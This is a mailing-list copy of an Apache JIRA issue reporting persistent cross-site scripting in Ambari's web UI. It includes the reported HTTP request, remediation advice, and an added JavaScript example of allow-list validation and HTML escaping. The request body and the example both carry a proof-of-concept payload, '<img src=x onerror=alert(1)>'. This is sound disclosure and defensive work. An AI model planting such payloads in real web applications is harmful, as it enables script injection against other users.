Posted to issues@ambari.apache.org by "Andrii Tkach (JIRA)" <ji...@apache.org> on 2019/05/27 08:00:00 UTC

[jira] [Assigned] (AMBARI-25287) Persistent Cross Site Scripting (XSS) in Ambari

     [ https://issues.apache.org/jira/browse/AMBARI-25287?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Andrii Tkach reassigned AMBARI-25287:
-------------------------------------

    Assignee: Andrii Tkach

> Persistent Cross Site Scripting (XSS) in Ambari
> -----------------------------------------------
>
>                 Key: AMBARI-25287
>                 URL: https://issues.apache.org/jira/browse/AMBARI-25287
>             Project: Ambari
>          Issue Type: Bug
>          Components: ambari-web
>    Affects Versions: 2.6.2
>            Reporter: Andrii Tkach
>            Assignee: Andrii Tkach
>            Priority: Critical
>
> Below are the HTTP request and response issued when a user submits a note containing JavaScript
> after modifying some configuration in the "Tez" service.
> HTTP Request:
> PUT /api/v1/clusters/<env> HTTP/1.1
> Host: xyz601:8080
> Content-Length: 199
> Accept: application/json, text/javascript, */*; q=0.01
> Origin: http://xyz601:8080
> X-Requested-With: XMLHttpRequest
> X-Requested-By: X-Requested-By
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
> like Gecko) Chrome/70.0.3538.102 Safari/537.36
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
> Referer: http://xyz:8080/
> Accept-Encoding: gzip, deflate
> Accept-Language: en-US,en;q=0.9
> Cookie: AMBARISESSIONID=vfiy4336mxwl1k5ehd6jrz43i
> Connection: close
> {"Clusters":{"desired_service_config_versions":
> {"service_config_version":4,"service_name":"TEZ","service_config_version_note":"Creat ed from service config version V4\n<img src=x onerror=alert(1)>"}
> }}
> Remediation Recommendations
> Restrict all input passed to the application to valid, whitelisted content, and ensure that all
> response/output sent by the server is HTML/URL/JavaScript encoded, depending on the context in
> which the data is used by the application.
> The remediation should not attempt to blacklist content and remove, filter, or sanitize it. There are
> too many types of encoding that can be used to get around filters for such content.
> We strongly recommend a positive security policy that specifies what is allowed.
> Negative or attack signature based policies are difficult to maintain and are likely to be incomplete.



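As an added illustration of the remediation described in the issue (this is example code, not Ambari's own implementation or the reporter's), the following contrasts a note that is concatenated into markup verbatim with one that is HTML-encoded for its output context, and adds the positive allow-list input policy the report recommends. The helper names, the allow-list pattern and the length limit are assumptions; the note text is the one from the reported request body.

```javascript
// Added example: allow-list input policy plus context-aware output encoding
// for a service config version note. Helper names and the policy itself are
// hypothetical; only the note text comes from the issue.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a string for insertion into an HTML text or quoted attribute context.
// Every character with markup meaning is replaced, nothing is stripped.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Positive security policy for the note: letters, digits, whitespace and a
// small set of punctuation, with a length cap. Anything else is rejected
// outright rather than filtered or "cleaned" (assumed policy, not Ambari's).
const NOTE_ALLOWED = /^[\p{L}\p{N}\s.,:;()\-_\/]*$/u;
function isAllowedNote(note) {
  return typeof note === 'string' && note.length <= 500 && NOTE_ALLOWED.test(note);
}

// "Before": the note is dropped into markup as-is, so a note that contains
// markup becomes part of the rendered page for every viewer.
function renderNoteUnsafe(note) {
  return `<td class="config-note">${note}</td>`;
}

// "After": the note is encoded for the HTML context it is placed in. The
// stored value is unchanged; only its representation in the page differs.
function renderNoteSafe(note) {
  return `<td class="config-note">${escapeHtml(note)}</td>`;
}

// Constructed sample input: the note value from the request in the issue.
const REPORTED_NOTE = 'Created from service config version V4\n<img src=x onerror=alert(1)>';

// Returns what each stage does with the reported note.
function demo() {
  return {
    accepted: isAllowedNote(REPORTED_NOTE),   // false: rejected at input
    unsafe: renderNoteUnsafe(REPORTED_NOTE),  // markup survives verbatim
    safe: renderNoteSafe(REPORTED_NOTE),      // markup rendered as text
  };
}

console.log(demo());
```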
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)